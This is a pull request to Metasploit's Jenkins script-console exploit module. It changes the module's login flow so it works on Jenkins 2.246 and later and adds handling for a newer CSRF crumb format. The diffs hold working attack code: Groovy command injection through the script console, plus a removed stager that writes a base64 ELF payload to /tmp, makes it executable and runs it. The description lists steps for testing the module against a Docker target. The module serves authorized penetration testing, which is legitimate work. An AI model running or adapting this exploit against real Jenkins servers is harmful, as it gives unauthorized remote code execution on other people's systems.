### PR TITLE
Fix Jenkins Login For Newer Versions

### DIFF
--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
             }
           ],
-          ['Linux', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+          ['Linux', { 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'linux' }],
           ['Unix CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'BadChars' => "\x22" } }]
         ],
         'DisclosureDate' => '2013-01-18',
@@ -139,30 +139,6 @@ class MetasploitModule < Msf::Exploit::Remote
     http_send_command(cmd.to_s)
   end
 
-  def linux_stager
-    cmds = 'echo LINE | tee FILE'
-    exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
-    base64 = Rex::Text.encode_base64(exe)
-    base64.gsub!(/=/, '\\u003d')
-    file = rand_text_alphanumeric(rand(4..7))
-
-    execute_command("touch /tmp/#{file}.b64")
-    cmds.gsub!(/FILE/, '/tmp/' + file + '.b64')
-    base64.each_line do |line|
-      line.chomp!
-      cmd = cmds
-      cmd.gsub!(/LINE/, line)
-      execute_command(cmds)
-    end
-
-    execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
-    execute_command("chmod +x /tmp/#{file}")
-    execute_command("rm /tmp/#{file}.b64")
-
-    execute_command("/tmp/#{file}")
-    @to_delete = "/tmp/#{file}"
-  end
-
   def exploit
     @uri = target_uri
     @uri.path = normalize_uri(@uri.path)
@@ -186,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
       else
         print_status('Logging in...')
         # get that first cookie that's needed by newer versions
-        res = send_request_cgi({'uri' => normalize_uri(@uri.path, 'login'), 'keep_cookies' => true})
+        res = send_request_cgi({ 'uri' => normalize_uri(@uri.path, 'login'), 'keep_cookies' => true })
         fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res&.code == 200
         if res.body =~ /action="(j_([a-z0-9_]+))"/
           uri = Regexp.last_match(1)
@@ -237,7 +213,7 @@ class MetasploitModule < Msf::Exploit::Remote
       http_send_command(payload.encoded.to_s)
     when 'linux'
       print_status("#{rhost}:#{rport} - Sending Linux stager...")
-      linux_stager
+      execute_cmdstager({ linemax: 2049 })
     end
 
     handler

--- a/modules/exploits/multi/http/jenkins_script_console.rb
+++ b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -99,7 +99,6 @@ class MetasploitModule < Msf::Exploit::Remote
           'Submit' => 'Run'
         }
     }
-    request_parameters['cookie'] = @cookie if !@cookie.nil?
     request_parameters['vars_post'][@crumb[:name]] = @crumb[:value] unless @crumb.nil?
     res = send_request_cgi(request_parameters)
     if !(res && (res.code == 200))
@@ -115,10 +114,10 @@ class MetasploitModule < Msf::Exploit::Remote
       String #{vars[:encoded]} = "#{Rex::Text.encode_base64(cmd)}";
       byte[] #{vars[:decoded]};
       try {
-        #{vars[:decoded]} = Base64.getDecoder().decode(#{vars[:encoded]} );
+        #{vars[:decoded]} = Base64.getDecoder().decode(#{vars[:encoded]});
       } catch(groovy.lang.MissingPropertyException e) {
-        sun.misc.BASE64Decoder #{vars[:decoder]}  = new sun.misc.BASE64Decoder();
-        #{vars[:decoded]} = #{vars[:decoder]}.decodeBuffer(#{vars[:encoded]} );
+        Object #{vars[:decoder]} = Eval.me("new sun.misc.BASE64Decoder()");
+        #{vars[:decoded]} = #{vars[:decoder]}.decodeBuffer(#{vars[:encoded]});
       }
     JCODE
 
@@ -172,7 +171,6 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi({ 'uri' => "#{@uri.path}script" })
     fail_with(Failure::Unknown, 'No Response received') if !res
 
-    @cookie = nil
     @crumb = nil
     if res.code != 200
       if datastore['API_TOKEN'].present?
@@ -187,9 +185,19 @@ class MetasploitModule < Msf::Exploit::Remote
         end
       else
         print_status('Logging in...')
+        # get that first cookie that's needed by newer versions
+        res = send_request_cgi({'uri' => normalize_uri(@uri.path, 'login'), 'keep_cookies' => true})
+        fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res&.code == 200
+        if res.body =~ /action="(j_([a-z0-9_]+))"/
+          uri = Regexp.last_match(1)
+        else
+          fail_with(Failure::UnexpectedReply, 'Failed to identify the login resource.')
+        end
+
         res = send_request_cgi({
           'method' => 'POST',
-          'uri' => normalize_uri(@uri.path, 'j_acegi_security_check'),
+          'uri' => normalize_uri(@uri.path, uri),
+          'keep_cookies' => true,
           'vars_post' =>
             {
               'j_username' => datastore['USERNAME'],
@@ -201,15 +209,9 @@ class MetasploitModule < Msf::Exploit::Remote
         if !(res && (res.code == 302)) || res.headers['Location'] =~ (/loginError/)
           fail_with(Failure::NoAccess, 'Login failed')
         end
-        if res.get_cookies.split('JSESSIONID').count > 2
-          sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[2].split('; ')[0]
-        else
-          sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
-        end
-        @cookie = sessionid.to_s
 
-        res = send_request_cgi({ 'uri' => "#{@uri.path}script", 'cookie' => @cookie })
-        fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res && (res.code == 200)
+        res = send_request_cgi({ 'uri' => "#{@uri.path}script" })
+        fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res&.code == 200
       end
     else
       print_status('No authentication required, skipping login...')
@@ -219,7 +221,10 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Using CSRF token: '#{Regexp.last_match(1)}' (.crumb style)")
       @crumb = { name: '.crumb', value: Regexp.last_match(1) }
     elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/ || res.body =~ /"crumb":"([a-z0-9]*)"/
-      print_status("Using CSRF token: '#{Regexp.last_match(1)}' (Jenkins-Crumb style)")
+      print_status("Using CSRF token: '#{Regexp.last_match(1)}' (Jenkins-Crumb style v1)")
+      @crumb = { name: 'Jenkins-Crumb', value: Regexp.last_match(1) }
+    elsif res.body =~ /data-crumb-value="([a-z0-9]*)"/
+      print_status("Using CSRF token: '#{Regexp.last_match(1)}' (Jenkins-Crumb style v2)")
       @crumb = { name: 'Jenkins-Crumb', value: Regexp.last_match(1) }
     end
 


### PR DESCRIPTION
Fixes #16945. Jenkins v2.246 ([pushed to docker July 21st 2020](https://hub.docker.com/layers/jenkins/jenkins/2.246/images/sha256-c3e00e828037da5daa6634e8b74be0f209fa58b99fb76a344bbc0fad243319f5?context=explore)) changed how the login works. This PR updates the exploit module to handle this, effectively allowing the module to target Jenkins version 2.246 and later.

Also dropped the custom linux stager favor of the standard CmdStager library. This wasn't done originally because it wasn't available yet, see my original comment on the matter here https://github.com/rapid7/metasploit-framework/pull/1338#issuecomment-12474751 At the time the command stagers were mixins and hadn't been unified yet until https://github.com/rapid7/metasploit-framework/pull/2484.

## Verification

List the steps needed to make sure this thing works

- [ ] Run a target docker container: `docker run -p 8080:8080 jenkins/jenkins:2.346.3`
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/jenkins_script_console`
- [ ] Set the `RPORT`, `TARGET`, `PAYLOAD` and `PASSWORD` options (the password is in the docker output)
- [ ] Run the module and see it work

Tested successfully on the following Jenkins versions (while trying to make sure there wasn't an intermediate version)

* 2.346.3 (crumb v2)
* 1.565 (old-style)
* 2.60.3 (crumb v1)
* 2.203 (crumb v1)
* 2.275 (crumb v2)
* 2.239 (crumb v1)
* 2.257 (crumb v2)
* 2.248 (crumb v2)
* 2.244 (crumb v1)
* 2.246 crumb v2)
* 2.245 (crumb v1)
